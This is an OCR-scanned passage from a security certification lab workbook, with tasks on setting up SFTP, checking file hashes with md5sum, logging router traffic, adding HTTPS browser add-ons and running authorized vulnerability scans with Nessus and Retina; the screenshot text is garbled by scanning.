Cornpression
(= Authentication
‘.- Canlificate Maps
i Certificate Revocation
- RADIUS
Deny Hast
- Aecass Control o
- SF1P o Alow  Deny
Triggers
Cannection Filters Logan r r
- Part-Formard Filters Shell ' r
- Logging Fiemate Execulion r r
- Aot SFTP ¥ r
Fort Farwarding u r
Remote Port Forwarding r r
Help oK I Cancel | Apply |

6. Make sure that Allow is checked next to the SFTP option and that all other options are
left blank.

Select the SFTP category on the left side of the dialog box.

8. Select the folders that you want your users to have access to. It’s a good idea to limit
users to a selected subfolder.

9. Use Windows Explorer to browse to the C:\ drive and create a folder named SFTP.

10. Return to the VShell program and click the Add button under the SFTP Options
category.

11. In the SFTP Root Path dialog box, in the SFTP Root field add the SFTP folder you
created in the last step. Name it root in the Alias field. Then click OK.

x
SFTP Roct =]
Blias: I'UDt
User/Group | Access | Add

Togale Access |
Remove |

ZUSERZ can be used to specify 8 usermname as part of the SFTP Roat Path. Far
example: C:3Users\ZUSERXASHp

See documentation for additional substitution variables that can be used.

Cancel |

12. Click OK to save your configuration.

13. You have now completed the setup of your SFTP server.
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Setting Up an SFTP Client

Now that you have set up an SFTP server, you will want to check it out to see how it works.
To do so, you will need an SFTP client. For this task, you will use WinSCP. It is a free SFTP
client that you can download.

1. Download the WinSCP client by going to http://winscp.net/eng/index.php.
2.

3.

To execute the program, simply open it; no installation is necessary.

Once WinSCP is open, enter the IP address of the server on which you have installed

VShell. You will also need to enter the username and password of the account that had
SFTP enabled.

WinSCP Login 2l x|

(=] Session

- Stored sessions
. Logging
Environment

- Directories

-~ SFTP

- SCP

-1- Connection

© ' Prowy

1 55H [
- Key exchange
- Authentication ”Flulucul

Session

Haost hame:
[192168.123.103

Part number
|22

=1
=]
Uszer name Password

Iian}' s

Private key flile

]

. Bugs  SFIP
‘- Preferences

& SFTP (allow GCP fallback)  scP ‘

Select color

Help |

¥ Advanced options

About. Languages | | Login I

Save.

4. WinSCP will now connect to the VShell, which is the SFTP server. Upon connection, it
will open the folder you have configured as the default folder.

"3 temp - jenry@192.168.123.103 - WinSCP _ o) x|
Local Mark Files Commands Session Options Remate Help
B0 HEe WS |FE S0 D
= CBOSSTHD -] da v o o [2] | T =3 sFTP E @ ot ¥ |3
Mame * Ext Size | Changed Flights
Parent directory 9412/2004 . [E=N 97642008 7:04:4.. rwemnwsn,
SeptB 2. File Folder 9M12/2004 .. =
Eencrypt... 3,261 Adobe Aciobat . 72000 L a
Eresmct.pdl 4,942 Adobe Aciobat . 82000 1. a
@cpbercn.. 9,007,432 Application 910/2004 .. a
Eﬁuapdf.l. 102,400 &pplication 12102004, a
@ Guapdf... 99562 Compiled HTML ... 12/13/2004.. 3
@Assessm. 47104 Microsoftword .. 4/26/2004 . 3
@EISSPD . 20992 Microsoftword .. 711472004 L 3
@\FTEI Se. 265,932 Rich TestFormat  9/12/2004 .. &
changes.. 1,156 Text Document 12A1/2004.. a
service.tit 35E Test Document 11182003, 3
4l |2l el | |
0B of 9,329 KB in 0 of 11 OB of 0B in0of 0
# FZRename [§f F4Edt B3 F5 Copy i35 FEMove K F7 Create Diiectory X F8 Delete [ F3 Properties JE1. F10 Quit
33298 3B 2 @ D e SFTP [v4) 0:01:21 P
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5.  You can now upload or download files as you like from this folder, as no restrictions
have been established.

6. The real value of SFTP over FTP is that the communication channel is secure and items
like usernames and passwords are not passed in clear text. To see this yourself, download
a copy of Wireshark, which is available at waw.wireshark.org. Once installed, it can be
used to capture encrypted and unencrypted traffic. If you were to capture SFTP traffic,
you would see that the information above the TCP level is actually encrypted.

Fle Edt View Go Ceplwe Anajwe Stalistcs Help

BEeeey cld 8 Re»2F2[HE QAQAA0 BVMEX S
Fiter. ;I Expression. | E\wl Auu\yl

No. - Time Source Destination Protocal | Info ﬂ

2 0.003356 192,168.123.103 192.168.123.101 S5H Encrypted response packet len=84

4 0.062012 192.168.123.103 1%2.168.123.101 S5H Encrypted response packet len=84 =
© Frame 3 (122 bytes on wire, 122 bytes captured)
[ Ethermer 1T, src: Netgear 126158 (00100:5h:i1F126:58), Dst: Trmel_27:ceca (00:08:135:27:ceicd)
IE Internet Pr‘DtUCEﬂ Src: 192.168.123.101 (192.168.123.101), Dst: 192.168.123.103 (192.168. 123 103)

EI SSH Protoco]
Encrypted Packet: 45744C0BEZLCOELL 93BACO2ELBABAFAABZD 20346435960 . ..

0000 00 Oe 33 27 <ce <4 00 09 oh 1f 26 58 03 00 47 00
0010 00 6c 4F 85 40 00 80 06 00 00 <0 a3 7b 65 cO a8
0020 7h &7 0a 35 00 16 8e e2 74 of 2¢ bf fb bs 50 18
0030 fe £3 78 7C 00 00 45 74 4c Ob EZ lc Oe 11 02 b:

&

0050 79 a9 e8 f7 88 99 35 59 98 06 47 bf e 04 cc
0060 28 S0 71 4F 03 £l 74 a7 84 30 b? 40 4d 57 bo e?
0070 aa 45 cB 27 25 aJ 12 42 60 4

File: "C:ADOCUME ~1\ADMINI~ T\LOCALS ~T\T emp\ethen0O0BETWET " 2734 KB 00:00:18 P: 3347 D: 3947 M: 0 Drops: 0

Criteria for Completion

You have completed this task when you have set up an SFTP server, connected to it with an
SFTP client, and verified its operation.

Task 7.10: Validating Downloads
and Checking the Hash

There is more to security than moving files over an encrypted channel. You also need to
have a means of verifying the integrity of the files and information transmitted. This is the
purpose of a hash. Hashes are used to check authentication and message integrity.

Scenario

Your organization will soon start posting code and applications on its SFTP site for its
partners in India. You have been asked to develop a method to verify the integrity of these
files and prove they remain intact.
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Scope of Task

Duration

This task should take about 10 minutes.

Setup

For this task, you’ll need a Windows computer, access to the Administrator account, and
an Internet connection. You must also have completed Task 7.9.

Caveat

Hashing algorithms only verify integrity and authentication. They cannot provide
confidentiality or protect information from changes. They only have the ability to
detect change.

Procedure

In this task, you will learn how to use the md5sum application.

Equipment Used

For this task, you must have:

= A Windows XP, Windows Vista, or Windows 7 computer
= Access to the Administrator account

= An Internet connection

Details

This task will show you how hashing algorithms are used to ensure integrity and prove that
a program remains unchanged.

Using Hashing Algorithms

1. Download the Windows version of mdSsum from http://etree.org/md5com.html.
It is a command-line program that you should install in the root of the C:\ drive.

The MD5 hashing algorithm is based on RFC 1321. It has been used as the
TE basis to create md5sum and several similar programs. md5sum is one of the

most widely used checksum algorithms today. It was created by Ron Rivest

and published in 1992. It is available for both Unix and Windows platforms.

2. After saving mdSsum to the C:\ drive, create a text file there named demo.txt. Add
to the file a line of text such as Hello World!.

3. Open a command prompt and change to the C directory.
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Enter md5sum demo. txt at the command-line prompt. Your output should look similar to this:
C:\>md5sum demo.txt

3579c8da7f1le0ad94656e76c886e5125 *demo.txt

Notice the string of numbers; that is the MD35 hashed value. If you record this value, you
can use it to compare later and detect whether any changes to the file have been made.
To better understand how hashing works, you should now change the filename to

demo2. txt.

With the filename changed, rerun mdSsum and compare the results to those you got earlier:
C:\>md5sum demo2.txt

3579c8da7fle0ad94656e76c886e5125 *demo?.txt

Notice how the two values are the same. This demonstrates that hashing algorithms do
not care about filenames.

Edit the demo2.txt file and change the text inside to It’s a cold cruel World!.

Enter mdSsum demo2.txt at the command-line prompt. Your output should look similar
to this:

C:\>md5sum demo2.txt

863433c5ba2f0c83c23810fa48ad6459 *demo2.txt

As you can see, the MDS5 value has changed. Hashing sums are changed when the
contents of a file are changed. They are unaffected by changes in the file date and filename.

Comparing the Hash of a Known File

1. In Task 7.9, you downloaded the WinSCP program. Go to the folder in which it was
installed and run md5sum against the WINSCPsetup. exe file:
C:\>WINSCP\md5sum WINSCPsetup.exe
3bb053732844b7cac6a856ac06dab642 *WINSCPsetup.exe
2. Now go to the WinSCP web page at http://winscp.net/download/winscp427release_
notes.txt and observe the listed mdSsum that is posted.
Notes for release 4.2.7 (2010-03-04%)
winscpdZisetup.exe
- MDS: 4c7235h358553e3eR382c35ehitZzfa’h?
- SHAl: e57e473126214c01d21f82bd£311d49850650ed0e
3. Notice that these two values match. This verifies that the file you downloaded and
installed is in fact intact and remains unchanged. This same feature could be used on
your own SFTP site to capture the integrity of files and assure users that the files are
correct and unchanged.
Tripwire is another well-known file-integrity program. It can perform hashing
TE on files, folders, and even complete drives to track changes or violations in

integrity.



Task 7.11: Logging and Recording Internet Activity 403

Criteria for Completion

You have completed this task when you have created a text file, verified its integrity, and
downloaded a second file and compared its mdSsum to one posted on the creator’s website.

Task 7.11: Logging and Recording
Internet Activity

Have you ever wondered what types of activity are really happening on your Internet
connection? There is a range of traffic, malware, exploits, and denial-of-service (DoS) attacks
sweeping the Internet at any moment. One way to get a better idea of what type of activity is
out there is by using a logging tool.

Scenario

Your organization has decided to get proactive about monitoring Internet activity and network
traffic. You have been asked to set up a logging device to review and monitor network traffic.

Scope of Task

Duration

This task should take about 30 minutes.

Setup

For this task, you’ll need a Windows computer, access to the Administrator account, and
an Internet connection.

Caveat

Logging is a detection control. As such, it only tells you what types of activities have
occurred. It does not prevent attacks from occurring.

Procedure

In this task, you will learn how to set up Link Logger.

Equipment Used
For this task, you must have:
= A Windows XP, Windows Vista, or Windows 7 computer

= Access to the Administrator account
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= An Internet connection

= A router

Details
This task will show you how logging is set up so you can review network traffic.

1. Download the Windows version of Link Logger from www.Tinklogger . com/download
.htm.

Link Logger supports a wide variety of routers, so make sure you download
TE the correct version before beginning.

After downloading the program, click Install and the program will automatically load.

Before you can use the program, you will need to first enable logging on the router. This
will allow your router to forward the information to the Link Logger program. You

will need to log on to your router and go to the logging page. Set the IP address to the
computer that you have Link Logger installed on. The system we have installed Link
Logger on is 192.168.123.150, so that is the IP address we have configured in the router.

ADivision of Gisco Systems, Inc. Fi 14

4-Port Gigabit Security Router with VPN RvS4000

IAdministration setup  Firewall IPS L2 Switch  Status

| Log | Di
Up

Log Setting || g | evel Al@~T)
o 1 2 3 4 5 [ 7

Outgoing Log OEnable © Disable | View Outgoing Table

Incoming Log OEnable @ Disable | “iew Incoming Table

Email Alerts | Email Alerts OEnable ® Disable
Denial of Service Thresholds events (20 - 100)
Log Queue Length entries (50 - 100)
Log Time Threshald minutes (10 - 10,000)

SMTP Mail Server, e

Ermil Address for dert Logs: ||

Return Email Address e e
Enable SMTP Authentication

E-rnail Log Now

Syslog | [Z]Enable

Syslog
Syslog Server |192.168.123.150] {Mame or IP Address)
Local Log . ) .
Local Log: Enable & Disable

View Log
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6. Edit the Router tab to match the IP address of the router. In our network, that is

Task 7.11: Logging and Recording Internet Activity

Open the Link Logger program. Alerts are recorded on the main screen.

File Edit Reports Help

et [ Dir [ Date / Time [ Pote [ SelP [SePat [ DestlP [ DestPot |
Traffic o Out: 0 Alerks: 0 Minirnurn Alert Ir bt Mirirnurm Alert Out E %

Sic P v Por| B Name| dh
Dest 1P| e Pat B Name| dth
Proto | B Service | Time ]

Alert

Info
Detail  InioURL

Alett | Dir | Date / Time | Poto | SelP | SePat | DestIP | DestPot |
History o Out: 0 Alerts: 0
Logging Suspended | 0items Relnaded into Traffic | @ ol | 5/28/2008 12:00:57 FM |

You will need to configure Link Logger to accept logs from the router. To do so,

choose Edit » Setup. This window has five tabs:

User This tab allows you to set up traffic load and history.

Audio This tab enables audio alerts for various types of events.

Email This tab allows you to have email sent for specific events.

Router This tab configures the source of logged events.

Database This tab allows Link Logger to be used in conjunction with a database.

192.168.123.254.

;-Link Logger Configuration

User | Audio | Emal  Router | Datopase|

Router Address [152 168123.254
WAN [P Address [000.0 {optional)

I~ Record raw logging data [for debugging anly)

ok I Cancel

405
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If Windows Firewall asks you to allow Link Logger traffic through, you
TE should unblock the port.

7. Once configured, Link Logger will begin to collect logs for review. Selecting the
Report menu option allows you to review any attacks that have been captured.

N Link Logger Reports

[ 2,393 - Windows SMB, RPC Scan
W 442 - RPC Scan
[ 299 - FileShare Scan, RPC Scan
B 24 - Remote Administrator
[ 24 - DipnetDddBob scan
W 22 - SEL Server Scan
- Code Red, himda
- Procy Scan
- 55H Scan
- Lovizate Scan
- MySGIL Server Scan
- DabberDoomran kackdoor scan
- Sasser FTP server

8. By choosing the IP Traffic tab, you can highlight or copy the details of the single attack
and perform further research. As an example, Link Logger captured these attacks
targeted at our computer network:

1 2008-01-08 09:07:25 Possible DoS HGOD SynKiller Flooding
67.212.170.234

2 2011-01-08 08:49:06 Possible DoS HGOD SynKiller Flooding
58.218.209.136

3 2011-01-08 08:48:32 Possible DoS HGOD SynKiller Flooding
61.176.194.92

4 2011-01-08 07:21:32 Possible DoS HGOD SynKiller Flooding
125.65.109.222

5 2011-01-08 07:17:23 Possible DoS HGOD SynKiller Flooding
202.109.175.74

9. You can use a tool like DShield (http://dshield.org/indexd.htm1) to look up these
addresses if you would like to know their origin. DShield is also a good resource for
learning more about specific attacks.

port/ip lookup/ search: CERAPAELEXC I Heol

DShield will also allow you to upload logs to their database so they can
TE better trend Internet attacks.
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Criteria for Completion

You have completed this task when you have set up Link Logger to capture traffic and
analyzed what types of activity are on your network.

Task 7.12: Using HTTPS to Encrypt
Web Traffic

The Web can be a dangerous place. Fake URLs, malicious links, and spyware are just a few
of the problems Internet users have to worry about. Another big concern is the protection
of Internet traffic. Anyone using an open wireless connection at a coffee shop or wired in
at a hotel could be vulnerable to sniffing attacks. One way to deter such activity is through
the use of encryption mechanisms such as HTTPS.

Scenario

Your organization is concerned about its road warriors and mobile employees who use the
Internet at public locations for work-related activities. You have been asked to develop a
low-cost security solution.

Scope of Task

Duration

This task should take about 10 minutes.

Setup

For this task, you’ll need a Windows computer, access to the Administrator account, and
an Internet connection.

Caveat

While HTTPS encryption provides an additional layer of protection, it cannot protect
against attacks such as key loggers.

Procedure

In this task, you will learn how to use the HTTPS Anywhere application.

Equipment Used
For this task, you must have:
= A Windows XP, Windows Vista, or Windows 7 computer

= Access to the Administrator account
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= An Internet connection

s The Firefox web browser

Details
This task will show you how to install HTTPS Anywhere.
Using Hashing Algorithms

1. Download HTTPS Anywhere from www.eff.org/deeplinks/2010/06/encrypt-web-
https-everywhere-firefox-extension. It is a browser add-on that can be installed
into Firefox.

HTTPS is a combination of the Transport Layer Security (TLS)/Secure

TE Sockets Layer (SSL) protocol and the Hypertext Transfer Protocol (HTTP).
Its purpose is to provide encrypted communication and the secure
identification of a network web server.

2. After clicking the Install Now button, you will be prompted to install HTTPS Anywhere.

Software Installation @

Install add-ens only from authors whom you trust.

Malicious software can damage your computer or viclate your privacy.

You have asked to install the following item:

https-everywhere-latest.xpi
https:/ v, eff.orgfiles/https-everywhere-latestxpi

3. Once installation is complete, you will be prompted to restart Firefox and then to
identify the well-known services you would like to secure via HTTPS.

HTTPS Everywhere Preferences @

Which HTTPS redirection rules should apply?

[E1iAmazon (buggy) Amazon 53 bitly coT Cisco

Dropbox DuckDuckGe EFF Evernote Facebock
[C] Facebook+ (may break apps) Gentoo GitHub GMX Google APIs
EragfleSeere Frrgataias Hotmail /Live [] Identica BaneT
Mail.com Meebo Microsoft Mozilla ML Overheid
Noiscbridge NYTimes PayPel Sl T
Twitter WashingtonPost Wikipedia WordPress.com Zoho

You can learn how to write your own rulesets (to add support for other web sites) here .

[ ox | [Enablean | [ concel
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4. Redirect your browser to waw.google.com and then to www.facebook.com. Notice the
extension for both sites now that you have installed HTTPS Anywhere.

File Edit View History Bookmarks Tools Help

r c Q ffacebook.com https://wwnw.facebook.com/pages/Superior-Solutions-Inc/230683436712 Eji',_'r v

£ Most Visited | | Getting Started 5 Latest Headlines

Superior Solutions, Inc. | Facebook x | 2 SuperiorSelutionsine (TheSelutionFi.., >

While most websites offer encryption for authentication, many still allow

TE subsequent browsing of their site via HTTP. HTTPS adds an additional
layer of protection for those sites. This additional layer of protection is
useful for anyone using a public Internet connection.

Criteria for Completion
You have completed this task when you have installed and configured HTTPS Anywhere.

Task 7.13: Using Force-TLS to Add
Security to Web Browsing

Sidejacking and sniffing are two big attack vectors that mobile Internet users must worry
about. Most people think little about the security implications of checking the Internet at a
coffee shop, airport, or even their favorite restaurant. As a security professional, you must
understand the differences in secure and insecure protocols such as HTTP and TLS and be
able to explain the dangers of using insecure protocols.

Scenario

Your organization is looking for low-cost solutions to help secure mobile users’ browsers.
You have been asked to provide some potential security solutions.

Scope of Task

Duration
This task should take about 10 minutes.

Setup

For this task, you’ll need a Windows computer, access to the Administrator account, and
an Internet connection.
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Caveat

While encryption adds an addition layer of protection, there is a small cost in performance
as additional overhead has been added.

Procedure

In this task, you will learn how to use the Force-TLS application.

Equipment Used

For this task, you must have:

= A Windows XP, Windows Vista, or Windows 7 computer
= Access to the Administrator account

= An Internet connection

s The Firefox web browser
Details

This task will show you how to install Force-TLS.

Using Hashing Algorithms

1. Download Force-TLS from https://addons.mozilla.org/en-US/firefox/addon/
force-tls/. It is a browser add-on that can be installed into Firefox.

TLS and SSL both perform the same basic function; however, there are
TE technical differences. While similar, TLS uses somewhat stronger encryption

algorithms and has additional support for ports not found in SSL.

2. After clicking the Install Now button, you will be prompted to install Force-TLS.

Software Installation @

Install add-ons only from authors whom you trust.

I
)

Malicious software can damage your computer er viclate your privacy,

Vou have asked to install the following item:

Férde Force-TLS (2,
- Dttpsi//addons

erified)

.org/firefox/downloads/latest12714/addon-12714- latestxpifsr




Task 7.13: Using Force-TLS to Add Security to Web Browsing m

3. After installation, you will be prompted to restart Firefox to finish the install process.
Once the browser has been restarted, you can configure Force-TLS by choosing Tools »
Force-TLS Configuration. For this example, the site www. facebook.com has been added.

w ForceTLS Settings EI

Use this dialog to add ForceTLS entries, or remove existing ones,

Address of web site:

Force Subdemains Teo Add Site
Site Expires
www.facebook.com Fri Jan 20 2012 02:18:30 GMT-0...
www.knowthetrade.com Frilan 20 2012 02:15:32 GMT-0...

[Bemnve Site ] [ Remove All Sites ]

4. Redirect your browser to www.twitter.com and then to www.facebook.com. Notice the
extension for Twitter is HTTP while Facebook is now HTTPS.

File Edit View History Bookmarks Tools Help

@ - c fh " fela= LAY https: /S www.facebook.com/pages/Superior-Solutions-Inc /230683436712 h_jfj -

2} Most Visited | | Getting Started 3 Latest Headlines

Force-TLS :: Add-ons for Firefox ® | 3 SuperiorSolutionsine (TheSolutionFi.., = | [Ed Superior Solutions, Inc. | Facebook X |_
Thanks for keeping me informed about Current Technalogy.
December 11, 2010 at 3:40am - Flag

Information

Location:
3730 Kirby Drive, Suite 1200
Houston, TX, 77098

Superior Solutions, Inc. The Official CISSP Movie List - While there isn't an
official CISSP movie list someone suggested a list of movies that have security
concepts. If you have some you would like to add to the list let me know!

1,142 People Like This

CISSP Study Tips — Movies with CISSP Exam Concepts | Ethical Hacking and

Not all websites offer HTTPS as an option. Personal information, credit
TE card numbers, or other sensitive information should never be entered on
sites that are not HTTPS.

Criteria for Completion

You have completed this task when you have installed and configured Force-TLS.
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Security testing is a key component of the security
professional’s duties. Attackers are becoming more
sophisticated every day; therefore, security professionals are
required to scan systems and networks to look for vulnerabilities. Security-testing tools can
examine internal or external systems. Some of these tools are free, whereas others require
you to pay an annual subscription.

Security-testing tools are not perfect. Any given tool can produce false positives or
negatives, or simply wreak havoc on your network if not used correctly. You need to plan
on using these tools at the appropriate times. You should also have a remediation plan in
place to address any discovered problems.

What makes these tools so useful is their ability to probe entire networks and find
potential problems. Then you can examine your network and identify whether security
updates or system patches are missing. It’s much better that you find and fix potential
problems before an attacker does. By securing these systems, your company can protect
itself against the financial losses associated with system downtime, theft of intellectual
property, denial-of-service (DoS) attacks, and negative publicity.

The tasks in this phase map to Domains 1, 3, and 4 in the objectives for the
TE CompTIA Security+ exam (www.comptia.org/certifications/listed/

security.aspx).

Task 8.1: Penetration Testing
with Nessus

Nessus, owned by Tenable Network Security, Inc., was developed in 1998 and has grown
to be the world’s most well-known security scanner. Its primary purpose is to alert the
user to security holes and vulnerabilities in scanned systems. It can be used to scan
Windows, Linux, or other operating systems. It uses a client-server technology so that
Nessus servers can be placed throughout the network and then be contacted when they are
needed by Nessus clients to perform scans. Nessus is an open source product, which means
it is free to use without you paying a license fee.
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Scenario

Your employer has asked that you scan the organization’s systems for vulnerabilities and
known exploits. Your employer does not want you to run any test that might compromise
the system by damaging it or by taking it offline.

Scope of Task

Duration

This task should take about 25 minutes.

Setup

For this task, you will need two or more network computers, access to the Administrator
account, and an Internet connection.

Caveat

Vulnerability scanners can cause problems and have been known to crash systems or make
systems hang. You will need to closely examine what types of scanner plug-ins are available
to help minimize the possibility that this could happen. Additionally, vulnerability scans can
cause intrusion detection system/intrusion protection system (IDS/IPS) devices/software to
produce false positives, which should be taken into consideration prior to scanning.

Procedure

In this task, you will learn how to install and run Nessus.

Equipment Used
For this task, you must have:

= Two or more networked computers, at least one running Windows XP, Windows Vista,
or Windows 7

= Internet access

Details

This task will show you how to install and run Nessus. This program will allow you to
scan networked systems for known vulnerabilities and security holes.

ING written permission to scan. System owners can become rather upset when
individuals scan their systems without permission, since this activity is
commonly performed by hackers before they launch an attack.

ﬁ" Be sure to scan only your own systems or those that you have been given

1. Once you have accessed your Windows computer and logged in as Administrator, open
your browser and go to www.nessus.org/downToad/.
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For this task, you will be using the Windows home version of Nessus. Once the
download is completed, you will be prompted to begin the installation.

During the installation, you will be prompted to accept the licensing agreement. You
must accept this agreement to complete the installation. Continue with the setup and
accept all the other default settings to complete the installation. After the installation is
completed and loaded, Nessus will update the plug-ins. Once all plug-ins are updated,

click Start Nessus Server.

Start the Messus server when Windows boots

“When enabled, the Nessus server will be automatically
started by Windows every time the system boots up,

*four scanner is registered and can download new plugins
Fram Tenable.

Clear registration File Update plugins

Perform a daily plugin update
If this option is set, your Messus server will update its plugins every
24 hours.,

Allow remote users to connect b this Messus server

The Messus server is not running.

Stop Nessus Server Start Messus Server

Plug-ins are written to address specific vulnerabilities.
TE
Once you are registered, you need to create a user account. Under Windows, open the

Nessus Server Manager program and click Manage Users to create accounts. After you
have created your user account, log into https://localhost:8834/ to get started.

Nessus
s  Policies

Reports

Name
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Nessus uses plug-ins to scan for specific vulnerabilities. Each plug-in performs a specific
security check. For this task, you should choose Policies to save a basic scan type. Add
the policy name of Basic and accept all other defaults. Click Scans to accept options.

Before the scan can begin, you will need to select the Add option to specify what
systems are to be scanned. You may enter a single system or enter a range of systems

to be scanned. For this task, choose your entire network range. We have chosen the
192.168.123.1-254 range.

Nessus

Scans Reports  Scans  Policies
@® Add Scan
e
[l Ploasesclectascanpoley v

SEUREREE 192.168.123.1-254

Choose Launch. Nessus will provide you with a status screen while the scan is being
performed.

Reports  Scans  Policies

Once Nessus completes its scan, you will be presented with a detailed report of its
findings. The report lists each system that was scanned and provides specific details on
all vulnerabilities that were found. You will need to scroll down the list to get a more
in-depth listing of what was found during the scan.
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basic

Host o | Total i
192.168.12320 14 o
192.168.12322 ” 0
192.168.123.110 2 0
192.168.128.111 4 0
1
0
2
0

ioh [Madum Low open Pt

"

192.168.128.113 £
192.168.128.114 4
192.168.123.116 5
192.168.128.120 16
192.168.128.124 15
192.168.128.130 s 0
192.168.123.181 4 0 s
192,168,123 254 2 0

Although Nessus is a great tool for performing automated vulnerability

TE scanning, its results can sometimes provide false positives. If you are unsure of
the results, you can double-check the results by running a second scan, using
an alternate tool, or even performing a manual inspection of the computer.

8. Nessus provides a lot of detail about the vulnerabilities it found and makes it easy
to use the information to patch or harden the system. An example follows:

Synopsis
The manufacturer can be deduced from the Ethernet OUI.

Description

Each ethernet MAC address starts with a 24-bit 'Organizationally
Unique Identifier'.

These OUI are registered by IEEE.

SoTlution
n/a
See Also

http://standards.ieee.org/faqs/0UI.html
http://standards.ieee.org/regauth/oui/index.shtml

Risk Factor
None

Plugin Output
The following card manufacturers were identified

00:e0:11:05:fd:53 : Uniden Corporation
Plugin Publication Date: 2009/02/19

Plugin Last Modification Date: 2010/10/26
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The information provided by Nessus includes the following:
Synopsis This output details item discovered.
Description This output provides the details of what was found.
Solution This output provides information on how to eliminate the problem.

Risk Factor This output indicates the severity of the risk, ranked as low, medium,
or high.

CVE The Common Vulnerabilities and Exposures (CVE) is a listing that provides com-
mon names for publicly known information-security vulnerabilities.

Nessus Plugin ID  This output provides the ID number that specifies the plug-in num-
ber used to discover the vulnerability.

Criteria for Completion

You have completed this task when you have downloaded, installed, and run Nessus to
perform a vulnerability scan.

Task 8.2: Penetration Testing
with Retina

Now that you have experienced Tenable Network Security’s Nessus vulnerability scanner,
it is appropriate that you have an opportunity to evaluate the Retina security scanner by
eEye. Retina is another full-featured scanner with the ability to scan an entire class-C
network in less than 15 minutes, and it can even do so from a nonadministrator account.
Most functions can be run from a nonadministrator account.

Scenario

Your manager has tasked you with evaluating Retina’s vulnerability scanner.

Scope of Task

Duration

This task should take about 15 minutes.

Setup

This task will require you to download and install Retina, a vulnerability scanner.
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Caveat

Vulnerability scanners can cause IDSs to signal an attack. Make sure that you have permission
to run a vulnerability scan on any network that you do not own. Vulnerability scans can cause
IDS/IPS devices/software to produce false positives, which should be taken into consideration
prior to scanning. Additionally, vulnerability scanners can cause systems to crash or hang, so
you should always use caution.

Procedure

In this task, you will learn how to install and run Retina.

Equipment Used

For this task, you must have:

s Two or more networked computers (at least one with a Windows OS)
= An Administrator account

= Internet access

Details

This task will show you how to install and run Retina. This program will allow you to
scan networked systems for known vulnerabilities and security holes.

L Scanning systems can sometimes cause problems or crashes; therefore,
ING you may want to run such tests during non-peak production times.

1. Once you have accessed your Windows computer and logged in as Administrator, open
your browser and go to www.brothersoft.com/retina-network-security-scanner-
223041.html.

You can download the single-system trial version of Retina from this location. Once
you’ve downloaded the program, execute it from the folder to which you saved it. This
will start the installation process.

2. During the installation, you will be prompted to accept the licensing agreement and
the program will have to reboot the system to complete the setup. After rebooting, the
installation will complete and Retina will start.

3. Upon startup, Retina will launch a wizard that will ask you several questions and guide
you through the scanning process. You will want to cancel out of the wizard and go
directly to the Retina interface so that you can explore its features. Across the top of
the screen you will see four tabs that describe Retina’s capabilities: Discover, Audit,
Remediate, and Report.
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twork Security Scanner -

: Yiew Tooks Help
 Addess: 192168123103

Discovery Tasks
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EVALUATION VERSION - 15 Days Remaining
. @ s

Scan Template: Complete Scan

Discover

Remediate

[ Actions

2
Jp StattDiscovery Scan
. Add To Addiess Group
o Scan Selected [P
I Clear Discovered ltems
Submit 05 Fingerpiint

Other Places

W Audt
A2 Remediate
T Fepons

€ Options

Help and Support

> Help Tapics
@ cEye Website

© Techrical Support
7 AboutRefin

[Togets select Targets
Options Taiget Type:

Fiom

192 168, 123. 1

i
192, 168. 123. 254
Schedule

3 Results

Drag a colamn headet here to group by that column.
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On the Discover tab, enter the range of addresses for your local network. After doing

so, select Options and ensure that all network-discovery options are checked.

Discover Audit Remediate Report

(I Actions

Targets
Options

Schedule

Select Netwark Discovery Options To Perform
ICMP Discoven
TEF Discovery On Ports:

EE] | ¥ GetNeiBIns Name
Gt MAC Addhess

UDP Discavery

Perform 05 Detection
Get Reverse DNS

2 results

Diaq  column header here to gioup by that column

Start the scan by clicking Discover. After a few minutes Retina should finish the

scanning of your network. You will be provided with a list of discovered systems, their
IP addresses, and the operating system versions they are running.
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|| Discover ||  Audt || Remediate || Repon
[ Actions
llingets Select Network Discovery Options To Perform
Dptions
¥ ICMP Discavery ¥ Pesform 05 Detection
¥ TCP Discovery On Ports: ¥ Get Reverse DNS
[138.445.80.25.21 | [l Get NetBIOS Name

¥ UDP Discovery ¥ Get MAC Addriess
Schedule

9 Resuts -

Dirag a column header here to group by that column.

IF &ddress / Maching Name DNS Name as MAC Addiess Date Discovered
192168123101 E&RTH EARTH windows 2000 00:09:56:1F: 26:58 8/30/2008 12.55.29 |
192168.123.103 INSTRUT1 instrutl Windows 2000, Service... 00:00:0C:00:00:23 8/30/2008 12.55.27
192168123108 MERCURY MERCURY Linuz 2.2 00:07-40:44:E0:16 B8/30/2006 12:55:31
192168.123.119 SOMTWIA0 SONYVIAD Windows 2000 OF Win... 00.0E:35:27.CE:C4 8/30/2008 12.55:33
192168123180 unknown Metopia R5300 Router  O0:0E:38:07:47:58 B8/30/2006 12:56:23
192168.123.181 unknown Edimax P5-301 Print $e... 00.0E:3E6.06:EB:53 8/30/2008 12.56.23
192168123184 unknown 00:05:50: 2503 C3 B8/30/2006 12:56:28
192168.123.185 unknown 00:01:E1:08:5F.C3 8/30/2008 12.56.22
192168123 254 unknown 00:00:94:CB:0C: 4F B/30/2006 125712

6. Choose the Audit tab. The Audit tab is used to detail the scan results from each
scanned system. After the scanning process is started as described in the previous
step, Retina will look for and examine open ports once they are discovered. At the
completion of the audit, it gives a complete listing of security vulnerabilities found.

| Dpiscover || Audt | Remediste | Report |
(=] Actions
[Targets goipct Targsts
Ports Target Type Output Type:
Audits [1P Range Jl
Options From: Fiensme
Credentials 182 168 123, 1 [ |
scan
o | 192, 168, 123. 254 [ |
(= scan Jobs
Active
1o Name Status Star Time End Time, Data Source
Completed i . i
Scheduled - -

O Miscellaneous Microsaft MDAC Buffer Overflow 332483 - 2000 =
[ Miscellaneous Microsoft Dffice: 2000 HTML Object Tag Code Execution

[ Miscellaneous Microsaft Office Excel Automatic Macro Execution =
[ Miscellaneous Microsoft Dffice Web Components Multiple Vulnerabilties [

O HeBlos Microsaft $MB Request Handler Buffer Dverflow - 2000
[@ Miscellaneous Micrasaft ¥M ByteCods Verifier System Compramise |
O Miscellaneous Microsaft ¥ JDEC Class Code Execution

[ Miscellaneous Microsoft webDAY XML Message Handler DioS - 2000 -

& vulnerabilty exists within the Micrasoft Vitual Machine ByteCode Verifier versians 5.0.3803 and
eailier allow for an attacker to bypass security checks and possibly execute atbitary cods viaa ~— —
maiicious Java applet on the targeted hast
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Choose the Remediate tab. The Remediate tab is used to generate a remediation report.
To generate, click once on the Generate button and allow the program a few seconds to
generate the report.

| Discover | | Audit | | Remediate | | Report
(=] configuration
\w— Group Report By Include In Repart:
@ ‘Vulnerabihly Mame » Categary Riigk. 2
Account Lockout Threshold Accounts M edium |
Sart Machines By:
